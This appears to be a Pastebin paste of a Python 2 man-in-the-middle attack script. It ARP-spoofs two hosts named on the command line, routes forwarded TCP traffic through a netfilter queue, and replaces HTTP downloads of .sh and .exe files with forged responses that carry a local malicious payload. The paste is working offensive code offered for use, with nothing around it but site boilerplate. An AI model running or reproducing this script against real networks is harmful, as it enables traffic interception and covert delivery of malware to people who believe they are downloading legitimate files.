Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python2
- from netfilterqueue import NetfilterQueue
- from scapy.all import *
- import os
- import socket
- import sys
- from termcolor import colored
- import threading
- import netifaces
- #host2 = "172.30.0.1"
- #host1 = "172.30.122.38"
- host2 = sys.argv[2]
- host1 = sys.argv[1]
- router_ip = "10.0.0.1"
- #my_mac = "52:54:00:80:3b:32"
- target_mac = "52:54:00:80:3b:32"
- my_mac = netifaces.ifaddresses(netifaces.interfaces()[1])[netifaces.AF_LINK][0]['addr']
- should_replace = False
- should_drop = False
- is_exe = False
- os.system('iptables -A FORWARD -p tcp -j NFQUEUE --queue-num 1')
- def callback(packet, temp):
- global should_replace
- global is_exe
- payload = packet.get_payload()
- pkt = IP(payload)
- data = print_get(pkt)
- if len(str(data)) > 5:
- print("*"*80)
- print(str(packet) + "\n")
- print(str(pkt['TCP'].load))
- if "GET" in data and ".sh" in data:
- should_replace = True
- is_exe = False
- print(colored("Found GET request for .sh file", "green"))
- if "GET" in data and ".exe" in data:
- should_replace = True
- is_exe = True
- print(colored("Found GET request for .exe file", "green"))
- if should_replace:
- should_replace = False
- print(colored("Replacing this packet", "red"))
- print("Destination: " + str(pkt['IP'].dst) + ", Source: " + str(pkt['IP'].src))
- print("Source Port: " + str(pkt['TCP'].sport) + ", Dest Port: " + str(pkt['TCP'].dport))
- print("Sequence is: " + str(pkt['TCP'].seq) + ", ACK is: " + str(pkt['TCP'].ack))
- bad = "THIS IS EVIL"
- if is_exe:
- with open('bad.exe') as f:
- bad = f.read()
- else:
- with open('bad.sh') as f:
- bad = f.read()
- bad = ("HTTP/1.1 200 OK\r\n" +
- "Server: Apache\r\n" +
- "Content-Length: " + str(len(bad)) + "\r\n" +
- "Connection: close\r\n" +
- "Content-type: text/html\r\n" +
- "\r\n" + bad)
- length = len(pkt['TCP'].payload)
- s = IP(src=pkt['IP'].dst, dst=pkt['IP'].src) / TCP(sport=pkt['TCP'].dport, dport=pkt['TCP'].sport, flags='PA', seq=pkt['TCP'].ack, ack=pkt['TCP'].seq + length) / str(bad)
- print("")
- print(s['TCP'].load)
- print(colored("Successfully built packet", "green"))
- send(s)
- print(colored("Sent forged packet", "green"))
- packet.drop()
- return
- packet.accept()
- def print_get(packet):
- ret = "\n".join(packet.sprintf("{Raw:%Raw.load%}\n").split("\r\n"))
- return ret
- def mitm():
- send(ARP(op=ARP.is_at, psrc=host1, pdst=host2, hwdst=my_mac))
- send(ARP(op=ARP.is_at, psrc=host2, pdst=host1, hwdst=my_mac))
- def unmitm():
- send(ARP(op=ARP.is_at, psrc=host1, pdst=host2, hwdst=target_mac))
- def start(packet):
- t = threading.Thread(target=callback, args = (packet, "hello"))
- t.daemon = True
- t.start()
- def main():
- print ("="*80)
- print("Setting up MITM...")
- mitm()
- print("="*80)
- q = NetfilterQueue()
- q.bind(1, start)
- try:
- q.run() # Main loop
- except KeyboardInterrupt:
- print("")
- print("Re-arping targets")
- unmitm()
- print("Unbinding queue")
- print("Clearing iptable settings")
- q.unbind()
- os.system('iptables -F')
- os.system('iptables -X')
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement